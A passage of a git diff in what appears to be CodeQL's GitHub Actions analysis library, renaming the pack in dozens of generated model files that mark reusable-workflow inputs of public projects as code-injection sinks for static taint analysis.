@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 11687fa31b63..9e1b26e1a293 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index 3d3947515997..4977c1d98817 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2fb4ca827636..2fa4322aff4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 92d91e541b90..5f90523e8335 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index ebf68ff3c126..9ffbce337f49 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 22f0fedcc07e..2182d445b831 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 23da361034c7..1928629382d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 19a5da19960b..59f7022fd895 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index abd0215aadad..f2e55b0dc5e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 5144d9ee2cb7..f92cfbba9c59 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 5a70ae48ec63..09318cf02bb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 81130d31fa38..48a3258e7a8a 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index f49f239ac9bf..cc8afde9d6a1 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 53be189b31ec..2960e471d2e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 2d6132a396fe..a4f095a23592 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0cb5e01e3aa9..cba130336692 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index cd3ca5d7c011..3fa02372683c 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index c8f1b93ef2d5..d31c7ee78044 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index 7877af9bbbf6..a270324f866d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 3d9b87166823..58dc1dd30af3 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index b14db181cce9..7255b0fa879a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 6a883e369c02..b2aacde75df2 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 9612750345dc..4bc1aec46a25 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 2c6f4438846e..1309dc357a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 109b1fefa7b9..a76e015ab89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 87f8bc706b6e..b9da0f85225b 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4c2f4e391b55..99e2d783c66b 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index e3e0a3460d47..cef0c9134aa7 100644 
--- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index 01539c4329ba..6c9f45dbad01 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index d26e49d3ef88..40856fa46b38 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index f5b370e3d593..807229fc6b5e 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 72659e362711..df2220211b94 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index f37d70a718d6..7faea6b07ef1 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 3b4ed4b18b57..43018d43110d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3dddb9bd3f9e..eaf9a48f30fb 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 49654eb84b87..b50566bcad6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index f46bcbee1b34..8bd7e837d38a 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index e3791339c035..7b76f842451e 100644 
--- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index f5f6c919cfbe..ee4636c6a2d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 4747cd57c4d7..5f1f9ea13ad3 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 3b68ca76fe2d..d2188efb8ee6 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 62b99c23ff64..ed86bf9266bb 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 84347b6cbfaf..79a253fe25e7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 32a3d5061e27..f78830a9f9a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index d4ffc373678e..789cdc003be6 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 5a5d3999ca75..a2d7f77b2531 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 9983ea4eee2a..c3d0b1d87514 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8acf5f2c3cf..35aeca022bc0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index bd7494ab69a6..419d80970fab 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 89b60a4ac845..07841ba0a180 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - 